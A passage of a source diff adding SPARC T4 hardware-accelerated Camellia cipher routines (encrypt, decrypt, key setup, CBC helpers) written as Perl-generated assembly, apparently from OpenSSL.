+	ldd		[$key + 40], %f18
+	movxtod		%o4, %f0
+	movxtod		%o5, %f2
+	ldd		[$key + 48], %f20
+	ldd		[$key + 56], %f22
+	sub		$rounds, 1, $rounds
+	ldd		[$key + 64], %f24
+	ldd		[$key + 72], %f26
+	add		$key, 80, $key
+
+.Lenc:
+	camellia_f	%f12, %f2, %f0, %f2
+	ldd		[$key + 0], %f12
+	sub		$rounds,1,$rounds
+	camellia_f	%f14, %f0, %f2, %f0
+	ldd		[$key + 8], %f14
+	camellia_f	%f16, %f2, %f0, %f2
+	ldd		[$key + 16], %f16
+	camellia_f	%f18, %f0, %f2, %f0
+	ldd		[$key + 24], %f18
+	camellia_f	%f20, %f2, %f0, %f2
+	ldd		[$key + 32], %f20
+	camellia_f	%f22, %f0, %f2, %f0
+	ldd		[$key + 40], %f22
+	camellia_fl	%f24, %f0, %f0
+	ldd		[$key + 48], %f24
+	camellia_fli	%f26, %f2, %f2
+	ldd		[$key + 56], %f26
+	brnz,pt		$rounds, .Lenc
+	add		$key, 64, $key
+
+	andcc		$out, 7, $tmp		! is output aligned?
+	camellia_f	%f12, %f2, %f0, %f2
+	camellia_f	%f14, %f0, %f2, %f0
+	camellia_f	%f16, %f2, %f0, %f2
+	camellia_f	%f18, %f0, %f2, %f0
+	camellia_f	%f20, %f2, %f0, %f4
+	camellia_f	%f22, %f0, %f4, %f2
+	fxor		%f24, %f4, %f0
+	fxor		%f26, %f2, %f2
+
+	bnz,pn		%icc, 2f
+	nop
+
+	std		%f0, [$out + 0]
+	retl
+	std		%f2, [$out + 8]
+
+2:	alignaddrl	$out, %g0, $out
+	mov		0xff, $mask
+	srl		$mask, $tmp, $mask
+
+	faligndata	%f0, %f0, %f4
+	faligndata	%f0, %f2, %f6
+	faligndata	%f2, %f2, %f8
+
+	stda		%f4, [$out + $mask]0xc0	! partial store
+	std		%f6, [$out + 8]
+	add		$out, 16, $out
+	orn		%g0, $mask, $mask
+	retl
+	stda		%f8, [$out + $mask]0xc0	! partial store
+.type	cmll_t4_encrypt,#function
+.size	cmll_t4_encrypt,.-cmll_t4_encrypt
+
+.globl	cmll_t4_decrypt
+.align	32
+cmll_t4_decrypt:
+	ld		[$key + 272], $rounds	! grandRounds, 3 or 4
+	andcc		$inp, 7, %g1		! is input aligned?
+	andn		$inp, 7, $inp
+
+	sll		$rounds, 6, $rounds
+	add		$rounds, $key, $key
+
+	ldx		[$inp + 0], %o4
+	bz,pt		%icc, 1f
+	ldx		[$inp + 8], %o5
+	ldx		[$inp + 16], $inp
+	sll		%g1, 3, %g1
+	sub		%g0, %g1, %g4
+	sllx		%o4, %g1, %o4
+	sllx		%o5, %g1, %g1
+	srlx		%o5, %g4, %o5
+	srlx		$inp, %g4, %g4
+	or		%o5, %o4, %o4
+	or		%g4, %g1, %o5
+1:
+	ldx		[$key + 0], %g4
+	ldx		[$key + 8], %g5
+	ldd		[$key - 8], %f12
+	ldd		[$key - 16], %f14
+	xor		%g4, %o4, %o4
+	xor		%g5, %o5, %o5
+	ldd		[$key - 24], %f16
+	ldd		[$key - 32], %f18
+	movxtod		%o4, %f0
+	movxtod		%o5, %f2
+	ldd		[$key - 40], %f20
+	ldd		[$key - 48], %f22
+	sub		$rounds, 64, $rounds
+	ldd		[$key - 56], %f24
+	ldd		[$key - 64], %f26
+	sub		$key, 64, $key
+
+.Ldec:
+	camellia_f	%f12, %f2, %f0, %f2
+	ldd		[$key - 8], %f12
+	sub		$rounds, 64, $rounds
+	camellia_f	%f14, %f0, %f2, %f0
+	ldd		[$key - 16], %f14
+	camellia_f	%f16, %f2, %f0, %f2
+	ldd		[$key - 24], %f16
+	camellia_f	%f18, %f0, %f2, %f0
+	ldd		[$key - 32], %f18
+	camellia_f	%f20, %f2, %f0, %f2
+	ldd		[$key - 40], %f20
+	camellia_f	%f22, %f0, %f2, %f0
+	ldd		[$key - 48], %f22
+	camellia_fl	%f24, %f0, %f0
+	ldd		[$key - 56], %f24
+	camellia_fli	%f26, %f2, %f2
+	ldd		[$key - 64], %f26
+	brnz,pt		$rounds, .Ldec
+	sub		$key, 64, $key
+
+	andcc		$out, 7, $tmp		! is output aligned?
+	camellia_f	%f12, %f2, %f0, %f2
+	camellia_f	%f14, %f0, %f2, %f0
+	camellia_f	%f16, %f2, %f0, %f2
+	camellia_f	%f18, %f0, %f2, %f0
+	camellia_f	%f20, %f2, %f0, %f4
+	camellia_f	%f22, %f0, %f4, %f2
+	fxor		%f26, %f4, %f0
+	fxor		%f24, %f2, %f2
+
+	bnz,pn		%icc, 2f
+	nop
+
+	std		%f0, [$out + 0]
+	retl
+	std		%f2, [$out + 8]
+
+2:	alignaddrl	$out, %g0, $out
+	mov		0xff, $mask
+	srl		$mask, $tmp, $mask
+
+	faligndata	%f0, %f0, %f4
+	faligndata	%f0, %f2, %f6
+	faligndata	%f2, %f2, %f8
+
+	stda		%f4, [$out + $mask]0xc0	! partial store
+	std		%f6, [$out + 8]
+	add		$out, 16, $out
+	orn		%g0, $mask, $mask
+	retl
+	stda		%f8, [$out + $mask]0xc0	! partial store
+.type	cmll_t4_decrypt,#function
+.size	cmll_t4_decrypt,.-cmll_t4_decrypt
+___
+}
+
+######################################################################
+# key setup subroutines
+#
+{
+sub ROTL128 {
+  my $rot = shift;
+
+	"srlx	%o4, 64-$rot, %g4\n\t".
+	"sllx	%o4, $rot, %o4\n\t".
+	"srlx	%o5, 64-$rot, %g5\n\t".
+	"sllx	%o5, $rot, %o5\n\t".
+	"or	%o4, %g5, %o4\n\t".
+	"or	%o5, %g4, %o5";
+}
+
+my ($inp,$bits,$out,$tmp)=map("%o$_",(0..5));
+$code.=<<___;
+.globl	cmll_t4_set_key
+.align	32
+cmll_t4_set_key:
+	and		$inp, 7, $tmp
+	alignaddr	$inp, %g0, $inp
+	cmp		$bits, 192
+	ldd		[$inp + 0], %f0
+	bl,pt		%icc,.L128
+	ldd		[$inp + 8], %f2
+
+	be,pt		%icc,.L192
+	ldd		[$inp + 16], %f4
+
+	brz,pt		$tmp, .L256aligned
+	ldd		[$inp + 24], %f6
+
+	ldd		[$inp + 32], %f8
+	faligndata	%f0, %f2, %f0
+	faligndata	%f2, %f4, %f2
+	faligndata	%f4, %f6, %f4
+	b		.L256aligned
+	faligndata	%f6, %f8, %f6
+
+.align	16
+.L192:
+	brz,a,pt	$tmp, .L256aligned
+	fnot2		%f4, %f6
+
+	ldd		[$inp + 24], %f6
+	nop
+	faligndata	%f0, %f2, %f0
+	faligndata	%f2, %f4, %f2
+	faligndata	%f4, %f6, %f4
+	fnot2		%f4, %f6
+
+.L256aligned:
+	std		%f0, [$out + 0]		! k[0, 1]
+	fsrc2		%f0, %f28
+	std		%f2, [$out + 8]		! k[2, 3]
+	fsrc2		%f2, %f30
+	fxor		%f4, %f0, %f0
+	b		.L128key
+	fxor		%f6, %f2, %f2
+
+.align	16
+.L128:
+	brz,pt		$tmp, .L128aligned
+	nop
+
+	ldd		[$inp + 16], %f4
+	nop
+	faligndata	%f0, %f2, %f0
+	faligndata	%f2, %f4, %f2
+
+.L128aligned:
+	std		%f0, [$out + 0]		! k[0, 1]
+	fsrc2		%f0, %f28
+	std		%f2, [$out + 8]		! k[2, 3]
+	fsrc2		%f2, %f30
+
+.L128key:
+	mov		%o7, %o5
+1:	call		.+8
+	add		%o7, SIGMA-1b, %o4
+	mov		%o5, %o7
+
+	ldd		[%o4 + 0], %f16
+	ldd		[%o4 + 8], %f18
+	ldd		[%o4 + 16], %f20
+	ldd		[%o4 + 24], %f22
+
+	camellia_f	%f16, %f2, %f0, %f2
+	camellia_f	%f18, %f0, %f2, %f0
+	fxor		%f28, %f0, %f0
+	fxor		%f30, %f2, %f2
+	camellia_f	%f20, %f2, %f0, %f2
+	camellia_f	%f22, %f0, %f2, %f0
+
+	bge,pn		%icc, .L256key
+	nop
+	std	%f0, [$out + 0x10]	! k[ 4,  5]
+	std	%f2, [$out + 0x18]	! k[ 6,  7]
+
+	movdtox	%f0, %o4
+	movdtox	%f2, %o5
+	`&ROTL128(15)`
+	stx	%o4, [$out + 0x30]	! k[12, 13]
+	stx	%o5, [$out + 0x38]	! k[14, 15]
+	`&ROTL128(15)`
+	stx	%o4, [$out + 0x40]	! k[16, 17]
+	stx	%o5, [$out + 0x48]	! k[18, 19]
+	`&ROTL128(15)`
+	stx	%o4, [$out + 0x60]	! k[24, 25]
+	`&ROTL128(15)`
+	stx	%o4, [$out + 0x70]	! k[28, 29]
+	stx	%o5, [$out + 0x78]	! k[30, 31]
+	`&ROTL128(34)`
+	stx	%o4, [$out + 0xa0]	! k[40, 41]
+	stx	%o5, [$out + 0xa8]	! k[42, 43]
+	`&ROTL128(17)`
+	stx	%o4, [$out + 0xc0]	! k[48, 49]
+	stx	%o5, [$out + 0xc8]	! k[50, 51]
+
+	movdtox	%f28, %o4		! k[ 0,  1]
+	movdtox	%f30, %o5		! k[ 2,  3]
+	`&ROTL128(15)`
+	stx	%o4, [$out + 0x20]	! k[ 8,  9]
+	stx	%o5, [$out + 0x28]	! k[10, 11]
+	`&ROTL128(30)`
+	stx	%o4, [$out + 0x50]	! k[20, 21]
+	stx	%o5, [$out + 0x58]	! k[22, 23]
+	`&ROTL128(15)`
+	stx	%o5, [$out + 0x68]	! k[26, 27]
+	`&ROTL128(17)`
+	stx	%o4, [$out + 0x80]	! k[32, 33]
+	stx	%o5, [$out + 0x88]	! k[34, 35]
+	`&ROTL128(17)`
+	stx	%o4, [$out + 0x90]	! k[36, 37]
+	stx	%o5, [$out + 0x98]	! k[38, 39]
+	`&ROTL128(17)`
+	stx	%o4, [$out + 0xb0]	! k[44, 45]
+	stx	%o5, [$out + 0xb8]	! k[46, 47]
+
+	mov		3, $tmp
+	st		$tmp, [$out + 0x110]
+	retl
+	xor		%o0, %o0, %o0
+
+.align	16
+.L256key:
+	ldd		[%o4 + 32], %f24
+	ldd		[%o4 + 40], %f26
+
+	std		%f0, [$out + 0x30]	! k[12, 13]
+	std		%f2, [$out + 0x38]	! k[14, 15]
+
+	fxor		%f4, %f0, %f0
+	fxor		%f6, %f2, %f2
+	camellia_f	%f24, %f2, %f0, %f2
+	camellia_f	%f26, %f0, %f2, %f0
+
+	std	%f0, [$out + 0x10]	! k[ 4,  5]
+	std	%f2, [$out + 0x18]	! k[ 6,  7]
+
+	movdtox	%f0, %o4
+	movdtox	%f2, %o5
+	`&ROTL128(30)`
+	stx	%o4, [$out + 0x50]	! k[20, 21]
+	stx	%o5, [$out + 0x58]	! k[22, 23]
+	`&ROTL128(30)`
+	stx	%o4, [$out + 0xa0]	! k[40, 41]
+	stx	%o5, [$out + 0xa8]	! k[42, 43]
+	`&ROTL128(51)`
+	stx	%o4, [$out + 0x100]	! k[64, 65]
+	stx	%o5, [$out + 0x108]	! k[66, 67]
+
+	movdtox	%f4, %o4		! k[ 8,  9]
+	movdtox	%f6, %o5		! k[10, 11]
+	`&ROTL128(15)`
+	stx	%o4, [$out + 0x20]	! k[ 8,  9]
+	stx	%o5, [$out + 0x28]	! k[10, 11]
+	`&ROTL128(15)`
+	stx	%o4, [$out + 0x40]	! k[16, 17]
+	stx	%o5, [$out + 0x48]	! k[18, 19]
+	`&ROTL128(30)`
+	stx	%o4, [$out + 0x90]	! k[36, 37]
+	stx	%o5, [$out + 0x98]	! k[38, 39]
+	`&ROTL128(34)`
+	stx	%o4, [$out + 0xd0]	! k[52, 53]
+	stx	%o5, [$out + 0xd8]	! k[54, 55]
+	ldx	[$out + 0x30], %o4	! k[12, 13]
+	ldx	[$out + 0x38], %o5	! k[14, 15]
+	`&ROTL128(15)`
+	stx	%o4, [$out + 0x30]	! k[12, 13]
+	stx	%o5, [$out + 0x38]	! k[14, 15]
+	`&ROTL128(30)`
+	stx	%o4, [$out + 0x70]	! k[28, 29]
+	stx	%o5, [$out + 0x78]	! k[30, 31]
+	srlx	%o4, 32, %g4
+	srlx	%o5, 32, %g5
+	st	%o4, [$out + 0xc0]	! k[48]
+	st	%g5, [$out + 0xc4]	! k[49]
+	st	%o5, [$out + 0xc8]	! k[50]
+	st	%g4, [$out + 0xcc]	! k[51]
+	`&ROTL128(49)`
+	stx	%o4, [$out + 0xe0]	! k[56, 57]
+	stx	%o5, [$out + 0xe8]	! k[58, 59]
+
+	movdtox	%f28, %o4		! k[ 0,  1]
+	movdtox	%f30, %o5		! k[ 2,  3]
+	`&ROTL128(45)`
+	stx	%o4, [$out + 0x60]	! k[24, 25]
+	stx	%o5, [$out + 0x68]	! k[26, 27]
+	`&ROTL128(15)`
+	stx	%o4, [$out + 0x80]	! k[32, 33]
+	stx	%o5, [$out + 0x88]	! k[34, 35]
+	`&ROTL128(17)`
+	stx	%o4, [$out + 0xb0]	! k[44, 45]
+	stx	%o5, [$out + 0xb8]	! k[46, 47]
+	`&ROTL128(34)`
+	stx	%o4, [$out + 0xf0]	! k[60, 61]
+	stx	%o5, [$out + 0xf8]	! k[62, 63]
+
+	mov		4, $tmp
+	st		$tmp, [$out + 0x110]
+	retl
+	xor		%o0, %o0, %o0
+.type	cmll_t4_set_key,#function
+.size	cmll_t4_set_key,.-cmll_t4_set_key
+.align	32
+SIGMA:
+	.long	0xa09e667f, 0x3bcc908b, 0xb67ae858, 0x4caa73b2
+	.long	0xc6ef372f, 0xe94f82be, 0x54ff53a5, 0xf1d36f1c
+	.long	0x10e527fa, 0xde682d1d, 0xb05688c2, 0xb3e6c1fd
+.type	SIGMA,#object
+.size	SIGMA,.-SIGMA
+.asciz	"Camellia for SPARC T4, David S. Miller, Andy Polyakov"
+___
+}
+
+{{{
+my ($inp,$out,$len,$key,$ivec,$enc)=map("%i$_",(0..5));
+my ($ileft,$iright,$ooff,$omask,$ivoff)=map("%l$_",(1..7));
+
+$code.=<<___;
+.align	32
+_cmll128_load_enckey:
+	ldx		[$key + 0], %g4
+	ldx		[$key + 8], %g5
+___
+for ($i=2; $i<26;$i++) {			# load key schedule
+    $code.=<<___;
+	ldd		[$key + `8*$i`], %f`12+2*$i`
+___
+}
+$code.=<<___;
+	retl
+	nop
+.type	_cmll128_load_enckey,#function
+.size	_cmll128_load_enckey,.-_cmll128_load_enckey
+_cmll256_load_enckey=_cmll128_load_enckey
+
+.align	32
+_cmll256_load_deckey:
+	ldd		[$key + 64], %f62
+	ldd		[$key + 72], %f60
+	b		.Load_deckey
+	add		$key, 64, $key
+_cmll128_load_deckey:
+	ldd		[$key + 0], %f60
+	ldd		[$key + 8], %f62
+.Load_deckey:
+___
+for ($i=2; $i<24;$i++) {			# load key schedule
+    $code.=<<___;
+	ldd		[$key + `8*$i`], %f`62-2*$i`
+___
+}
+$code.=<<___;
+	ldx		[$key + 192], %g4
+	retl
+	ldx		[$key + 200], %g5
+.type	_cmll256_load_deckey,#function
+.size	_cmll256_load_deckey,.-_cmll256_load_deckey
+
+.align	32
+_cmll128_encrypt_1x:
+___
+for ($i=0; $i<3; $i++) {
+    $code.=<<___;
+	camellia_f	%f`16+16*$i+0`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+2`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+4`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+6`, %f0, %f2, %f0
+___
+$code.=<<___ if ($i<2);
+	camellia_f	%f`16+16*$i+8`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+10`, %f0, %f2, %f0
+	camellia_fl	%f`16+16*$i+12`, %f0,      %f0
+	camellia_fli	%f`16+16*$i+14`, %f2,      %f2
+___
+}
+$code.=<<___;
+	camellia_f	%f56, %f2, %f0, %f4
+	camellia_f	%f58, %f0, %f4, %f2
+	fxor		%f60, %f4, %f0
+	retl
+	fxor		%f62, %f2, %f2
+.type	_cmll128_encrypt_1x,#function
+.size	_cmll128_encrypt_1x,.-_cmll128_encrypt_1x
+_cmll128_decrypt_1x=_cmll128_encrypt_1x
+
+.align	32
+_cmll128_encrypt_2x:
+___
+for ($i=0; $i<3; $i++) {
+    $code.=<<___;
+	camellia_f	%f`16+16*$i+0`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+0`, %f6, %f4, %f6
+	camellia_f	%f`16+16*$i+2`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+2`, %f4, %f6, %f4
+	camellia_f	%f`16+16*$i+4`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+4`, %f6, %f4, %f6
+	camellia_f	%f`16+16*$i+6`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+6`, %f4, %f6, %f4
+___
+$code.=<<___ if ($i<2);
+	camellia_f	%f`16+16*$i+8`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+8`, %f6, %f4, %f6
+	camellia_f	%f`16+16*$i+10`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+10`, %f4, %f6, %f4
+	camellia_fl	%f`16+16*$i+12`, %f0,      %f0
+	camellia_fl	%f`16+16*$i+12`, %f4,      %f4
+	camellia_fli	%f`16+16*$i+14`, %f2,      %f2
+	camellia_fli	%f`16+16*$i+14`, %f6,      %f6
+___
+}
+$code.=<<___;
+	camellia_f	%f56, %f2, %f0, %f8
+	camellia_f	%f56, %f6, %f4, %f10
+	camellia_f	%f58, %f0, %f8, %f2
+	camellia_f	%f58, %f4, %f10, %f6
+	fxor		%f60, %f8, %f0
+	fxor		%f60, %f10, %f4
+	fxor		%f62, %f2, %f2
+	retl
+	fxor		%f62, %f6, %f6
+.type	_cmll128_encrypt_2x,#function
+.size	_cmll128_encrypt_2x,.-_cmll128_encrypt_2x
+_cmll128_decrypt_2x=_cmll128_encrypt_2x
+
+.align	32
+_cmll256_encrypt_1x:
+	camellia_f	%f16, %f2, %f0, %f2
+	camellia_f	%f18, %f0, %f2, %f0
+	ldd		[$key + 208], %f16
+	ldd		[$key + 216], %f18
+	camellia_f	%f20, %f2, %f0, %f2
+	camellia_f	%f22, %f0, %f2, %f0
+	ldd		[$key + 224], %f20
+	ldd		[$key + 232], %f22
+	camellia_f	%f24, %f2, %f0, %f2
+	camellia_f	%f26, %f0, %f2, %f0
+	ldd		[$key + 240], %f24
+	ldd		[$key + 248], %f26
+	camellia_fl	%f28, %f0, %f0
+	camellia_fli	%f30, %f2, %f2
+	ldd		[$key + 256], %f28
+	ldd		[$key + 264], %f30
+___
+for ($i=1; $i<3; $i++) {
+    $code.=<<___;
+	camellia_f	%f`16+16*$i+0`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+2`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+4`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+6`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+8`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+10`, %f0, %f2, %f0
+	camellia_fl	%f`16+16*$i+12`, %f0,      %f0
+	camellia_fli	%f`16+16*$i+14`, %f2,      %f2
+___
+}
+$code.=<<___;
+	camellia_f	%f16, %f2, %f0, %f2
+	camellia_f	%f18, %f0, %f2, %f0
+	ldd		[$key + 16], %f16
+	ldd		[$key + 24], %f18
+	camellia_f	%f20, %f2, %f0, %f2
+	camellia_f	%f22, %f0, %f2, %f0
+	ldd		[$key + 32], %f20
+	ldd		[$key + 40], %f22
+	camellia_f	%f24, %f2, %f0, %f4
+	camellia_f	%f26, %f0, %f4, %f2
+	ldd		[$key + 48], %f24
+	ldd		[$key + 56], %f26
+	fxor		%f28, %f4, %f0
+	fxor		%f30, %f2, %f2
+	ldd		[$key + 64], %f28
+	retl
+	ldd		[$key + 72], %f30
+.type	_cmll256_encrypt_1x,#function
+.size	_cmll256_encrypt_1x,.-_cmll256_encrypt_1x
+
+.align	32
+_cmll256_encrypt_2x:
+	camellia_f	%f16, %f2, %f0, %f2
+	camellia_f	%f16, %f6, %f4, %f6
+	camellia_f	%f18, %f0, %f2, %f0
+	camellia_f	%f18, %f4, %f6, %f4
+	ldd		[$key + 208], %f16
+	ldd		[$key + 216], %f18
+	camellia_f	%f20, %f2, %f0, %f2
+	camellia_f	%f20, %f6, %f4, %f6
+	camellia_f	%f22, %f0, %f2, %f0
+	camellia_f	%f22, %f4, %f6, %f4
+	ldd		[$key + 224], %f20
+	ldd		[$key + 232], %f22
+	camellia_f	%f24, %f2, %f0, %f2
+	camellia_f	%f24, %f6, %f4, %f6
+	camellia_f	%f26, %f0, %f2, %f0
+	camellia_f	%f26, %f4, %f6, %f4
+	ldd		[$key + 240], %f24
+	ldd		[$key + 248], %f26
+	camellia_fl	%f28, %f0, %f0
+	camellia_fl	%f28, %f4, %f4
+	camellia_fli	%f30, %f2, %f2
+	camellia_fli	%f30, %f6, %f6
+	ldd		[$key + 256], %f28
+	ldd		[$key + 264], %f30
+___
+for ($i=1; $i<3; $i++) {
+    $code.=<<___;
+	camellia_f	%f`16+16*$i+0`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+0`, %f6, %f4, %f6
+	camellia_f	%f`16+16*$i+2`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+2`, %f4, %f6, %f4
+	camellia_f	%f`16+16*$i+4`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+4`, %f6, %f4, %f6
+	camellia_f	%f`16+16*$i+6`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+6`, %f4, %f6, %f4
+	camellia_f	%f`16+16*$i+8`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+8`, %f6, %f4, %f6
+	camellia_f	%f`16+16*$i+10`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+10`, %f4, %f6, %f4
+	camellia_fl	%f`16+16*$i+12`, %f0,      %f0
+	camellia_fl	%f`16+16*$i+12`, %f4,      %f4
+	camellia_fli	%f`16+16*$i+14`, %f2,      %f2
+	camellia_fli	%f`16+16*$i+14`, %f6,      %f6
+___
+}
+$code.=<<___;
+	camellia_f	%f16, %f2, %f0, %f2
+	camellia_f	%f16, %f6, %f4, %f6
+	camellia_f	%f18, %f0, %f2, %f0
+	camellia_f	%f18, %f4, %f6, %f4
+	ldd		[$key + 16], %f16
+	ldd		[$key + 24], %f18
+	camellia_f	%f20, %f2, %f0, %f2
+	camellia_f	%f20, %f6, %f4, %f6
+	camellia_f	%f22, %f0, %f2, %f0
+	camellia_f	%f22, %f4, %f6, %f4
+	ldd		[$key + 32], %f20
+	ldd		[$key + 40], %f22
+	camellia_f	%f24, %f2, %f0, %f8
+	camellia_f	%f24, %f6, %f4, %f10
+	camellia_f	%f26, %f0, %f8, %f2
+	camellia_f	%f26, %f4, %f10, %f6
+	ldd		[$key + 48], %f24
+	ldd		[$key + 56], %f26
+	fxor		%f28, %f8, %f0
+	fxor		%f28, %f10, %f4
+	fxor		%f30, %f2, %f2
+	fxor		%f30, %f6, %f6
+	ldd		[$key + 64], %f28
+	retl
+	ldd		[$key + 72], %f30
+.type	_cmll256_encrypt_2x,#function
+.size	_cmll256_encrypt_2x,.-_cmll256_encrypt_2x
+
+.align	32
+_cmll256_decrypt_1x:
+	camellia_f	%f16, %f2, %f0, %f2
+	camellia_f	%f18, %f0, %f2, %f0
+	ldd		[$key - 8], %f16
+	ldd		[$key - 16], %f18
+	camellia_f	%f20, %f2, %f0, %f2
+	camellia_f	%f22, %f0, %f2, %f0
+	ldd		[$key - 24], %f20
+	ldd		[$key - 32], %f22
+	camellia_f	%f24, %f2, %f0, %f2
+	camellia_f	%f26, %f0, %f2, %f0
+	ldd		[$key - 40], %f24
+	ldd		[$key - 48], %f26
+	camellia_fl	%f28, %f0, %f0
+	camellia_fli	%f30, %f2, %f2
+	ldd		[$key - 56], %f28
+	ldd		[$key - 64], %f30
+___
+for ($i=1; $i<3; $i++) {
+    $code.=<<___;
+	camellia_f	%f`16+16*$i+0`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+2`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+4`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+6`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+8`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+10`, %f0, %f2, %f0
+	camellia_fl	%f`16+16*$i+12`, %f0,      %f0
+	camellia_fli	%f`16+16*$i+14`, %f2,      %f2
+___
+}
+$code.=<<___;
+	camellia_f	%f16, %f2, %f0, %f2
+	camellia_f	%f18, %f0, %f2, %f0
+	ldd		[$key + 184], %f16
+	ldd		[$key + 176], %f18
+	camellia_f	%f20, %f2, %f0, %f2
+	camellia_f	%f22, %f0, %f2, %f0
+	ldd		[$key + 168], %f20
+	ldd		[$key + 160], %f22
+	camellia_f	%f24, %f2, %f0, %f4
+	camellia_f	%f26, %f0, %f4, %f2
+	ldd		[$key + 152], %f24
+	ldd		[$key + 144], %f26
+	fxor		%f30, %f4, %f0
+	fxor		%f28, %f2, %f2
+	ldd		[$key + 136], %f28
+	retl
+	ldd		[$key + 128], %f30
+.type	_cmll256_decrypt_1x,#function
+.size	_cmll256_decrypt_1x,.-_cmll256_decrypt_1x
+
+.align	32
+_cmll256_decrypt_2x:
+	camellia_f	%f16, %f2, %f0, %f2
+	camellia_f	%f16, %f6, %f4, %f6
+	camellia_f	%f18, %f0, %f2, %f0
+	camellia_f	%f18, %f4, %f6, %f4
+	ldd		[$key - 8], %f16
+	ldd		[$key - 16], %f18
+	camellia_f	%f20, %f2, %f0, %f2
+	camellia_f	%f20, %f6, %f4, %f6
+	camellia_f	%f22, %f0, %f2, %f0
+	camellia_f	%f22, %f4, %f6, %f4
+	ldd		[$key - 24], %f20
+	ldd		[$key - 32], %f22
+	camellia_f	%f24, %f2, %f0, %f2
+	camellia_f	%f24, %f6, %f4, %f6
+	camellia_f	%f26, %f0, %f2, %f0
+	camellia_f	%f26, %f4, %f6, %f4
+	ldd		[$key - 40], %f24
+	ldd		[$key - 48], %f26
+	camellia_fl	%f28, %f0, %f0
+	camellia_fl	%f28, %f4, %f4
+	camellia_fli	%f30, %f2, %f2
+	camellia_fli	%f30, %f6, %f6
+	ldd		[$key - 56], %f28
+	ldd		[$key - 64], %f30
+___
+for ($i=1; $i<3; $i++) {
+    $code.=<<___;
+	camellia_f	%f`16+16*$i+0`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+0`, %f6, %f4, %f6
+	camellia_f	%f`16+16*$i+2`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+2`, %f4, %f6, %f4
+	camellia_f	%f`16+16*$i+4`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+4`, %f6, %f4, %f6
+	camellia_f	%f`16+16*$i+6`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+6`, %f4, %f6, %f4
+	camellia_f	%f`16+16*$i+8`, %f2, %f0, %f2
+	camellia_f	%f`16+16*$i+8`, %f6, %f4, %f6
+	camellia_f	%f`16+16*$i+10`, %f0, %f2, %f0
+	camellia_f	%f`16+16*$i+10`, %f4, %f6, %f4
+	camellia_fl	%f`16+16*$i+12`, %f0,      %f0
+	camellia_fl	%f`16+16*$i+12`, %f4,      %f4
+	camellia_fli	%f`16+16*$i+14`, %f2,      %f2
+	camellia_fli	%f`16+16*$i+14`, %f6,      %f6
+___
+}
+$code.=<<___;
+	camellia_f	%f16, %f2, %f0, %f2
+	camellia_f	%f16, %f6, %f4, %f6
+	camellia_f	%f18, %f0, %f2, %f0
+	camellia_f	%f18, %f4, %f6, %f4
+	ldd		[$key + 184], %f16
+	ldd		[$key + 176], %f18
+	camellia_f	%f20, %f2, %f0, %f2
+	camellia_f	%f20, %f6, %f4, %f6
+	camellia_f	%f22, %f0, %f2, %f0
+	camellia_f	%f22, %f4, %f6, %f4
+	ldd		[$key + 168], %f20
+	ldd		[$key + 160], %f22
+	camellia_f	%f24, %f2, %f0, %f8
+	camellia_f	%f24, %f6, %f4, %f10
+	camellia_f	%f26, %f0, %f8, %f2
+	camellia_f	%f26, %f4, %f10, %f6
+	ldd		[$key + 152], %f24
+	ldd		[$key + 144], %f26
+	fxor		%f30, %f8, %f0
+	fxor		%f30, %f10, %f4
+	fxor		%f28, %f2, %f2
+	fxor		%f28, %f6, %f6
+	ldd		[$key + 136], %f28
+	retl
+	ldd		[$key + 128], %f30
+.type	_cmll256_decrypt_2x,#function
+.size	_cmll256_decrypt_2x,.-_cmll256_decrypt_2x
+___
+
+&alg_cbc_encrypt_implement("cmll",128);
+&alg_cbc_encrypt_implement("cmll",256);
+
+&alg_cbc_decrypt_implement("cmll",128);
+&alg_cbc_decrypt_implement("cmll",256);
+
+if ($::evp) {
+    &alg_ctr32_implement("cmll",128);
+    &alg_ctr32_implement("cmll",256);
+}
+}}}
+
+if (!$::evp) {
+$code.=<<___;
+.global	Camellia_encrypt
+Camellia_encrypt=cmll_t4_encrypt
+.global	Camellia_decrypt
+Camellia_decrypt=cmll_t4_decrypt
+.global	Camellia_set_key
+.align	32
+Camellia_set_key:
+	andcc		%o2, 7, %g0		! double-check alignment
+	bnz,a,pn	%icc, 1f
+	mov		-1, %o0
+	brz,a,pn	%o0, 1f
+	mov		-1, %o0
+	brz,a,pn	%o2, 1f
+	mov		-1, %o0
+	andncc		%o1, 0x1c0, %g0
+	bnz,a,pn	%icc, 1f
+	mov		-2, %o0
+	cmp		%o1, 128
+	bl,a,pn		%icc, 1f
+	mov		-2, %o0
+	b		cmll_t4_set_key
+	nop
+1:	retl
+	nop
+.type	Camellia_set_key,#function
+.size	Camellia_set_key,.-Camellia_set_key
+___
+
+my ($inp,$out,$len,$key,$ivec,$enc)=map("%o$_",(0..5));
+
+$code.=<<___;
+.globl	Camellia_cbc_encrypt
+.align	32
+Camellia_cbc_encrypt:
+	ld		[$key + 272], %g1
+	nop
+	brz		$enc, .Lcbc_decrypt
+	cmp		%g1, 3
+
